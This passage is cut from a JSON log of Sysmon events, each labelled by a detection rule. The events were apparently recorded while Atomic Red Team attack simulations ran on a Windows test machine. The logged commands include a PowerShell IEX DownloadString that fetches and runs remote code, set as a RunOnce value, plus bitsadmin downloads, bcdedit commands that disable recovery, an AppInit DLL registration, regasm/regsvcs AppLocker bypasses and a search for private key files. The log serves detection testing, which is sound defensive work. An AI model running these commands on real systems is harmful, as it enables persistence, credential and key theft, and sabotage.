14:45:06.132"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3601,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:06.137175Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ProcessId":6472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:45:06.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3603,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:06.196458Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ParentProcessId":6472,"ProcessGuid":"747F3D96-D772-5D31-0000-001083ED2800","ProcessId":6120,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:45:06.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3604,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:06.213488Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`\")\"","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence - via Run key","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun","UtcTime":"2019-07-19 14:45:19.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3607,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:19.483250Z"}},"Version":2}}}},{"detection":["Startup Folder File Write"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-07-18 
20:53:13.080","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Notepad.lnk","UtcTime":"2019-07-19 14:45:31.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3609,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:31.287863Z"}},"Version":2}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ProcessId":5800,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:55.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3613,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:55.681219Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ParentProcessId":5800,"ProcessGuid":"747F3D96-D7A3-5D31-0000-0010D2B42900","ProcessId":6176,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:45:55.694"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3614,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:55.699293Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe\" T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7BB-5D31-0000-0010D5092A00","ProcessId":1060,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:46:19.479"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3619,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:46:19.484316Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence or CredAccess - Lsa NotificationPackge","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Notification Packages","UtcTime":"2019-07-19 14:47:21.917"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3632,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:47:21.972037Z"}},"Version":2}}}},{"detection":["New DLL Added to AppInit_DLLs Registry Key"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D809-5D31-0000-00105C262B00","ProcessId":6056,"RuleName":"Persistence - 
AppInit","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs","UtcTime":"2019-07-19 14:47:37.136"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3635,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:47:37.147054Z"}},"Version":2}}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001064AD2B00","ParentProcessId":6508,"ProcessGuid":"747F3D96-D817-5D31-0000-001097B02B00","ProcessId":396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:47:51.844"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3648,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:47:51.865963Z"}},"Version":5}}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"bcdedit.exe /set {default} recoveryenabled no","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} recoveryenabled no\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001049B42B00","ParentProcessId":6216,"ProcessGuid":"747F3D96-D817-5D31-0000-0010B7B62B00","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:47:51.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3650,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:47:52.010791Z"}},"Version":5}}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D824-5D31-0000-001023F42B00","ParentProcessId":6736,"ProcessGuid":"747F3D96-D824-5D31-0000-001075F62B00","ProcessId":1540,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:48:04.122"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3655,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:48:04.131410Z"}},"Version":5}}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D83E-5D31-0000-0010A2D72E00","ParentProcessId":4036,"ProcessGuid":"747F3D96-D83E-5D31-0000-0010AAD92E00","ProcessId":3732,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:48:30.796"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3660,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:48:30.807486Z"}},"Version":5}}}},{"detection":["Discover Private Keys"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ProcessId":888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:48:57.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3677,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:48:57.524876Z"}},"Version":5}}}},{"detection":["Discover Private Keys"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c:\\ /b /s .key \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-001045922F00","ProcessId":6220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:48:57.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3678,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:48:57.557947Z"}},"Version":5}}}},{"detection":["Discover Private Keys"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"findstr /e .key","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Find String (QGREP) Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=393F2422D22079BFB0022598D70BEB294F2024F4,MD5=DC0816790EFA08AA5B55C1EECFDDB525,SHA256=750AB5E1F3EB18CC42A4A4C7BAB27753F6B26FB9752AD3861833753091044281,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F","Image":"C:\\Windows\\System32\\findstr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-00109E932F00","ProcessId":948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:48:57.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3679,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:48:57.570057Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 